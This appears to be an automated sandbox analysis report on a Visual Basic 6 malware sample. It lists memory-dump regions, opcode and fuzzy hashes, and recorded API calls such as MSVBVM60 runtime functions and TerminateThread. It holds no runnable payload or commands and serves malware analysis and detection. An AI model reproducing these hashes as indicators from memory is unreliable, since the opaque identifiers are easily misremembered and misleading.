                                                • Opcode ID: b3068badcd882274a187a3d923a2dc14459289b92036f2f8eb57d5cbe142335d
                                                • Instruction ID: 1aeebe172890c5dad1a0857c97ffc5cb0a6ecf917068188a60cd96f81e5f2205
                                                • Opcode Fuzzy Hash: b3068badcd882274a187a3d923a2dc14459289b92036f2f8eb57d5cbe142335d
                                                • Instruction Fuzzy Hash: 75110675168349DFDB6C5F3499567FB77A2AF44340F42062EA88B86260DB304841CA06
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd919b81d2e17a03cf043d504ee4641bd76fb7789d6582d2836623a054514cc9
                                                • Instruction ID: fdb95031137fda1560636207ea1f8b20c84fdb596b30db8488cba2457b0796d2
                                                • Opcode Fuzzy Hash: bd919b81d2e17a03cf043d504ee4641bd76fb7789d6582d2836623a054514cc9
                                                • Instruction Fuzzy Hash: 9511B2325053858BDB38AE758E513EEB7F2AF51364FA6451ECC8ACB129D73196818B01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13e444ebf8b4c22d2dbc8f06382f834662403eb79924592017507247ed6099db
                                                • Instruction ID: c6c38c641c737413b4547df25f225e2e358c6c16e4d55cbe6fbad42dd65593ca
                                                • Opcode Fuzzy Hash: 13e444ebf8b4c22d2dbc8f06382f834662403eb79924592017507247ed6099db
                                                • Instruction Fuzzy Hash: 91012230429694CFCB26CF58C884690BBB0FF09228F19069DDC486B322CB72A956CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b780e01a63f6c4a42b6a90fc1a3057e7bf25e7984a729666fa9a9c1c87eb1a30
                                                • Instruction ID: bcda328a10e5e2d878bc36a587af14f9b2b8055486d77ba250bfed9adb41fcdd
                                                • Opcode Fuzzy Hash: b780e01a63f6c4a42b6a90fc1a3057e7bf25e7984a729666fa9a9c1c87eb1a30
                                                • Instruction Fuzzy Hash: EFC02BC3C3D3964503B330F4B1091AF400306D735C3B6CD602C11AE20CE425CEC11D80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f3a4c99a52a0bf1043ca4e2338c74384df1bb0affa59ab7e074d435ea442f10
                                                • Instruction ID: e64a82a5fe33b999219e363e6fc7cdbc30b42c40e5bcc5771ca96bcb1eded26e
                                                • Opcode Fuzzy Hash: 5f3a4c99a52a0bf1043ca4e2338c74384df1bb0affa59ab7e074d435ea442f10
                                                • Instruction Fuzzy Hash: 9AC092B6225680CFEF02CF08D991B60B3A0FB19A88F0C05E0E802CF752C3A4ED00CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • #512.MSVBVM60(004029D0,00000002), ref: 0041EE57
                                                • __vbaStrMove.MSVBVM60 ref: 0041EE68
                                                • __vbaStrCmp.MSVBVM60(004029B8,00000000), ref: 0041EE70
                                                • __vbaFreeStr.MSVBVM60 ref: 0041EE83
                                                • #554.MSVBVM60 ref: 0041EE92
                                                • #613.MSVBVM60(?,?), ref: 0041EEAB
                                                • __vbaStrVarMove.MSVBVM60(?), ref: 0041EEB5
                                                • __vbaStrMove.MSVBVM60 ref: 0041EEC0
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EECB
                                                • __vbaNew2.MSVBVM60(00402904,00423494), ref: 0041EEE7
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0226EB44,004028F4,00000014), ref: 0041EF0C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402914,000000C8), ref: 0041EF36
                                                • __vbaFreeObj.MSVBVM60 ref: 0041EF3F
                                                • #716.MSVBVM60(?,Ynkmulslerneko,00000000), ref: 0041EF4F
                                                • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041EF76
                                                • __vbaFreeVar.MSVBVM60 ref: 0041EF7F
                                                • __vbaNew2.MSVBVM60(00401F48,00423010), ref: 0041EF97
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00738440,0040259C,00000160), ref: 0041EFC2
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000004,00000000), ref: 0041EFD3
                                                • __vbaI4Var.MSVBVM60(00000000), ref: 0041EFDD
                                                • __vbaFreeObj.MSVBVM60 ref: 0041EFE6
                                                • __vbaFreeVar.MSVBVM60 ref: 0041EFEF
                                                • __vbaFreeStr.MSVBVM60(0041F035), ref: 0041F025
                                                • __vbaFreeObj.MSVBVM60 ref: 0041F02E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresultMove$LateNew2$#512#554#613#716CallList
                                                • String ID: Ynkmulslerneko
                                                • API String ID: 3932479610-3209129563
                                                • Opcode ID: 511fc55fb95d1e30ea6352166064d55f1a24df680b7f00817924fc9d38f0429f
                                                • Instruction ID: 0e5fbc06c66a61cc13feb7b3be8fd85aed4b24f8d66214b59412ad5fb190163c
                                                • Opcode Fuzzy Hash: 511fc55fb95d1e30ea6352166064d55f1a24df680b7f00817924fc9d38f0429f
                                                • Instruction Fuzzy Hash: B7515175A00209AFCB14DF94DE89EDEBBB8FF48705F104529F542B32A0D7745986CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __vbaVarDup.MSVBVM60 ref: 0041EC37
                                                • #717.MSVBVM60(?,?,00000003,00000000), ref: 0041EC48
                                                • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041EC64
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EC77
                                                • #706.MSVBVM60(00000001,00000000,00000000), ref: 0041EC8D
                                                • __vbaStrMove.MSVBVM60 ref: 0041EC98
                                                • #554.MSVBVM60 ref: 0041EC9E
                                                • __vbaNew2.MSVBVM60(00402904,00423494), ref: 0041ECB6
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0226EB44,004028F4,00000014), ref: 0041ECE1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402914,00000110), ref: 0041ED0F
                                                • __vbaStrMove.MSVBVM60 ref: 0041ED1A
                                                • __vbaFreeObj.MSVBVM60 ref: 0041ED23
                                                • __vbaNew2.MSVBVM60(00402904,00423494), ref: 0041ED3B
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0226EB44,004028F4,0000004C), ref: 0041ED60
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029BC,0000002C), ref: 0041ED9F
                                                • __vbaFreeObj.MSVBVM60 ref: 0041EDA8
                                                • __vbaFreeStr.MSVBVM60(0041EDF0), ref: 0041EDE8
                                                • __vbaFreeStr.MSVBVM60 ref: 0041EDED
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresult$MoveNew2$#554#706#717List
                                                • String ID:
                                                • API String ID: 1080988887-0
                                                • Opcode ID: b77ba6821eda705ec9d84e7a641bfd5a489aabecc7f039ebc54e70647c08910d
                                                • Instruction ID: fb7d85f21408a0e6260f8418227450407240ae3abad634d92004a90dc7fa318c
                                                • Opcode Fuzzy Hash: b77ba6821eda705ec9d84e7a641bfd5a489aabecc7f039ebc54e70647c08910d
                                                • Instruction Fuzzy Hash: 7351AF71A00219EFCB14DF95DE89EEEBBB8FF48304F10412AE505B72A0D7785945CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __vbaNew2.MSVBVM60(00401F48,00423010,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA24
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00738440,0040259C,0000015C,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA4C
                                                • __vbaNew2.MSVBVM60(00401F48,00423010,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA65
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA7E
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028D4,00000178,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EAA5
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EAB4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$CheckHresultNew2$Free
                                                • String ID:
                                                • API String ID: 877497001-0
                                                • Opcode ID: c739f79b8b34166fe03c275f2f445eaa02473afb5cb6d6d3bffe0bb05a031976
                                                • Instruction ID: 690c78243f7cdd36269d283a1af073243fe848584c43811d7d9501bf1a146230
                                                • Opcode Fuzzy Hash: c739f79b8b34166fe03c275f2f445eaa02473afb5cb6d6d3bffe0bb05a031976
                                                • Instruction Fuzzy Hash: 8D217F78A40200ABC710DF55CD49FAA7BB8FF88741F644826F981F72A1D67859818BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __vbaNew2.MSVBVM60(00401F48,00423010,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6), ref: 0041EB34
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00738440,0040259C,00000220), ref: 0041EB5F
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EB6F
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6), ref: 0041EB79
                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6,4202A27F), ref: 0041EB82
                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6,4202A27F), ref: 0041EB8B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CallCheckHresultLateNew2
                                                • String ID:
                                                • API String ID: 369400049-0
                                                • Opcode ID: 9a281853ab97a633618956330f6ec073355df9e7248d6c9820aca11fe0eac67e
                                                • Instruction ID: cffffcc2ae7f5bd2401fc031d03621fe9e20f9460b1c0c7113104e63c4737f48
                                                • Opcode Fuzzy Hash: 9a281853ab97a633618956330f6ec073355df9e7248d6c9820aca11fe0eac67e
                                                • Instruction Fuzzy Hash: 54118F74900214BBCB10DF95DE8DE9EBBB8FF48B05F10046AF482B31A0D7786641CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • TerminateThread.KERNEL32(-10664DAE,-0000000178E7204E), ref: 0056D7CF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.242863659625.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 1c19aba1ae88beae4517ed82db7d0d1a78e36f845514dbd98da04f4a968b03cb
                                                • Instruction ID: e0920a04ade3e77712b3e90724d7df268cdcb13a435f6530b8c6545515b8bcb2
                                                • Opcode Fuzzy Hash: 1c19aba1ae88beae4517ed82db7d0d1a78e36f845514dbd98da04f4a968b03cb
                                                • Instruction Fuzzy Hash: B3416E74A04345CFDB248F14C899BA17FB5FF96318F5496A9C4090F2A6CB71C986CB63
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateThread.KERNEL32(-10664DAE,-0000000178E7204E), ref: 0056D7CF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.242863659625.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: a735b9573bd35f7f43c3c833e87b017c2a66711b83ce6406ca741bb3e97c73f2
                                                • Instruction ID: 02094e639354c332fcc496b0e33e886e39658699b422162f676d914cfb8c0c94
                                                • Opcode Fuzzy Hash: a735b9573bd35f7f43c3c833e87b017c2a66711b83ce6406ca741bb3e97c73f2
                                                • Instruction Fuzzy Hash: 0F414A74A04345CFDB248F14C899BA17FB2FF56318F499699C4090F2AACB708986CB63
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateThread.KERNEL32(-10664DAE,-0000000178E7204E), ref: 0056D7CF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.242863659625.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID: TerminateThread
                                                • String ID:
                                                • API String ID: 1852365436-0
                                                • Opcode ID: 93e90ed96db0e149397167c54beb0823c3ecec1ff0d4014a198755abd37cf9c7
                                                • Instruction ID: 47fd56b1f58b3ba16f88b833d928ef2659fa83d648b252a0b385ce0e6d3f26ce
                                                • Opcode Fuzzy Hash: 93e90ed96db0e149397167c54beb0823c3ecec1ff0d4014a198755abd37cf9c7
                                                • Instruction Fuzzy Hash: 3E312B34A04345CFDB248F14C899BA07FA2FF56359F599699C4090F2A6CB708D46CBA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions